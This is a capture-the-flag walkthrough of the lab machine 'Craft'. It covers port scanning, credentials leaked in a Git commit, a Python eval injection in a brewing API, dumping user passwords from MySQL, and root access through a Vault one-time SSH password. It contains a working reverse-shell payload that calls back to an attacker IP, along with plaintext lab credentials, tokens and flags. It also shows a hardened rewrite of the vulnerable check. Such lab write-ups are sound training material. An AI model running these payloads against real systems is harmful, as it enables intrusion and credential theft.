Information Gathering
| IP Address | Open Ports |
|---|---|
| 10.10.10.110 | TCP: 22, 443, 6022 |
```bash
ip='10.10.10.110'; itf='tun0'
# The original check used "-Pn -sn": -Pn skips host discovery, so nmap reported
# "Host is up" unconditionally and the reachability test never failed. Plain -sn
# actually probes the host before the port scan starts.
if nmap -sn "$ip" | grep -q "Host is up"; then
    echo -e "\e[32m[+] Target $ip is up, scanning ports...\e[0m"
    # masscan all TCP and UDP ports, keep only the port numbers, deduplicate, comma-join
    ports=$(sudo masscan -p1-65535,U:1-65535 "$ip" --rate=1000 -e "$itf" \
        | awk '/open/ {print $4}' | cut -d '/' -f1 | sort -nu | tr '\n' ',' | sed 's/,$//')
    if [ -n "$ports" ]; then
        echo -e "\e[34m[+] Open ports found on $ip: $ports\e[0m"
        nmap -Pn -sV -sC -p "$ports" "$ip"
    else
        echo -e "\e[31m[!] No open ports found on $ip.\e[0m"
    fi
else
    echo -e "\e[31m[!] Target $ip is unreachable, network is down.\e[0m"
fi
```
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
| 2048 bde76c22817adb3ec0f0731df3af7765 (RSA)
| 256 82b5f9d1953b6d800f3591862db3d766 (ECDSA)
|_ 256 283b2618ecdfb336859c27548d8ce133 (ED25519)
443/tcp open ssl/http nginx 1.15.8
|_http-title: About
|_http-server-header: nginx/1.15.8
| ssl-cert: Subject: commonName=craft.htb/organizationName=Craft/stateOrProvinceName=NY/countryName=US
| Not valid before: 2019-02-06T02:25:47
|_Not valid after: 2020-06-20T02:25:47
| tls-nextprotoneg:
|_ http/1.1
| tls-alpn:
|_ http/1.1
|_ssl-date: TLS randomness does not represent time
6022/tcp open ssh (protocol 2.0)
| ssh-hostkey:
|_ 2048 5bccbff1a18f72b0c0fbdfa301dca6fb (RSA)
| fingerprint-strings:
| NULL:
|_ SSH-2.0-Go
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port6022-TCP:V=7.93%I=7%D=3/9%Time=67CD326B%P=x86_64-pc-linux-gnu%r(NUL
SF:L,C,"SSH-2\.0-Go\r\n");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
gogs leak && Craft API && Python eval
# echo '10.10.10.110 craft.htb'>>/etc/hosts
https://craft.htb/
# echo '10.10.10.110 api.craft.htb gogs.craft.htb'>>/etc/hosts
https://api.craft.htb/api
https://gogs.craft.htb/
https://gogs.craft.htb/Craft/craft-api/commit/a2d28ed1554adddfcfb845879bfea09f976ab7c1
username:dinesh
password:4aUh0A8PbVJxgd
URL:https://api.craft.htb/api/auth/login
https://gogs.craft.htb/Craft/craft-api/commit/c414b160578943acfe2e158e89409623f41da4c6
eval('%s > 1' % request.json['abv'])
1. Obtain a token
token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjoiZGluZXNoIiwiZXhwIjoxNzQxNTAxNzY2fQ.b4Wde8XjJQs1UZ9phQCeDWBdtJqsWi0jMxA3hi6GZOY
https://gogs.craft.htb/Craft/craft-api/src/master/tests/test.py
POST /api/brew/ HTTP/1.1
Host: api.craft.htb
Content-Length: 122
Sec-Ch-Ua: "Chromium";v="111", "Not(A:Brand";v="8"
Accept: application/json
Content-Type: application/json
X-Craft-API-Token:eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjoiZGluZXNoIiwiZXhwIjoxNzQxNTAyNjQ0fQ.U3Pbe3MOCpeM_nWurXn5AfQJO6KsPuakF4ZIaM2Wiq8
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.65 Safari/537.36
Sec-Ch-Ua-Platform: "Linux"
Origin: https://api.craft.htb
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://api.craft.htb/api/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
{
"id": 0,
"brewer": "x",
"name": "x",
"style": "x",
"abv": "__import__('os').system('ping -c 1 10.10.16.33')"
}
Note on how Python eval runs this payload: the injected text is evaluated as a single expression, so modules can only be loaded dynamically through __import__(); an import statement, or any multi-statement code, cannot be used.
{
"id": 0,
"brewer": "x",
"name": "x",
"style": "x",
"abv": "__import__('os').system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.33 443 >/tmp/f')"
}
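As an added example (my own code, not the Craft API repository's), the ABV check from the commit above rebuilt in two forms: the eval-based version, shown executing an arbitrary expression through a harmless sentinel, and a hardened replacement that validates the value as a number and never evaluates input. Function and variable names are assumptions.

```python
import re
from typing import Any

# Sentinel used only to prove that the vulnerable path executes caller-supplied code.
EXECUTED: list[str] = []


def check_abv_vulnerable(abv: Any) -> bool:
    """Mirrors the Craft API check: True means 'ABV is greater than 1' (rejected).
    The JSON value is formatted straight into the expression, so any Python
    expression supplied as 'abv' runs with the API's privileges."""
    return bool(eval('%s > 1' % abv))


# A plain decimal number: digits, optional fraction, nothing else.
_ABV_RE = re.compile(r'^(0|[1-9]\d*)(\.\d+)?$')


def check_abv_safe(abv: Any) -> bool:
    """Hardened replacement: input is never evaluated as code.
    Accepts only JSON numbers or plain decimal strings; anything else raises
    ValueError before any comparison happens."""
    if isinstance(abv, bool):  # bool is an int subclass; reject it explicitly
        raise ValueError("abv must be a number")
    if isinstance(abv, (int, float)):
        value = float(abv)
    elif isinstance(abv, str) and _ABV_RE.match(abv.strip()):
        value = float(abv.strip())
    else:
        raise ValueError("abv must be a number")
    return value > 1


def validate_brew(body: dict) -> tuple[int, str]:
    """Simplified request handler: returns (status, message) like a Flask view."""
    try:
        if check_abv_safe(body.get('abv')):
            return 400, "ABV must be a decimal value less than 1.0"
    except ValueError as exc:
        return 400, str(exc)
    return 201, "Beer created"
```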
Lateral Movement:gilfoyle
/opt/app # tar -czvf /opt/app.tar.gz -C /opt app
CRAFT_API_SECRET = 'hz66OCkDtv8G6D'
MYSQL_DATABASE_USER = 'craft'
MYSQL_DATABASE_PASSWORD = 'qLGockJ6G2J75O'
MYSQL_DATABASE_DB = 'craft'
```python
#!/usr/bin/env python
import pymysql

# Connect with the database credentials recovered from the application settings.
connection = pymysql.connect(
    host='db',
    user='craft',
    password='qLGockJ6G2J75O',
    db='craft',
    cursorclass=pymysql.cursors.DictCursor
)


def show_tables(cursor):
    """List the tables in the current database and return the raw rows."""
    sql = "SHOW TABLES"
    cursor.execute(sql)
    tables = cursor.fetchall()
    print("\nTables in the database:")
    for idx, table in enumerate(tables, start=1):
        print(f"{idx}. {table['Tables_in_craft']}")
    print("\n")
    return tables


def show_table_data(cursor, table_name):
    """Dump every row of one table as a simple pipe-separated listing."""
    sql = f"SELECT * FROM `{table_name}`"
    cursor.execute(sql)
    rows = cursor.fetchall()
    if rows:
        print(f"\nData in table {table_name}:")
        columns = rows[0].keys()
        print(f"{' | '.join(columns)}")
        print("-" * (len(' | '.join(columns))))
        for row in rows:
            print(' | '.join(str(row[column]) for column in columns))
    else:
        print(f"\nTable {table_name} is empty.")
    print("\n")


def main():
    try:
        with connection.cursor() as cursor:
            while True:
                tables = show_tables(cursor)
                user_input = input("Enter the number corresponding to the table to view data, or 'exit' to quit: ").strip()
                if user_input.lower() == 'exit':
                    print("Exiting program.")
                    break
                if user_input.isdigit():
                    table_idx = int(user_input) - 1
                    if 0 <= table_idx < len(tables):
                        table_name = tables[table_idx]['Tables_in_craft']
                        show_table_data(cursor, table_name)
                    else:
                        print("Invalid table number. Please try again.")
                else:
                    print("Invalid input. Please enter a valid table number or 'exit'.")
    finally:
        connection.close()


if __name__ == "__main__":
    main()
```
$ python3 exp.py
1 | dinesh | 4aUh0A8PbVJxgd
4 | ebachman | llJ77D8QFkLPQB
5 | gilfoyle | ZEU3N8WNM2rh4T
Log in as gilfoyle
https://gogs.craft.htb/user/login
https://gogs.craft.htb/gilfoyle/craft-infra/src/master/.ssh/id_rsa
Password:ZEU3N8WNM2rh4T
User.txt
8acca2cd2d6aa23703904828ba442997
Privilege Escalation:.vault-token && One-time SSH passwords
Vault is a tool for managing sensitive data such as API keys, passwords and certificates.
gilfoyle@craft:~$ cat .vault-token;vault login
token:f1783c8d-41c7-0b12-d1c1-cf2aa17ac6b9
gilfoyle@craft:~$ vault write ssh/creds/root_otp ip=127.0.0.1
key:67ebe3d4-cd6b-6e5c-6803-c635715eee91
gilfoyle@craft:~$ ssh root@127.0.0.1
Root.txt
8369706eff98143d8d461826b6282b01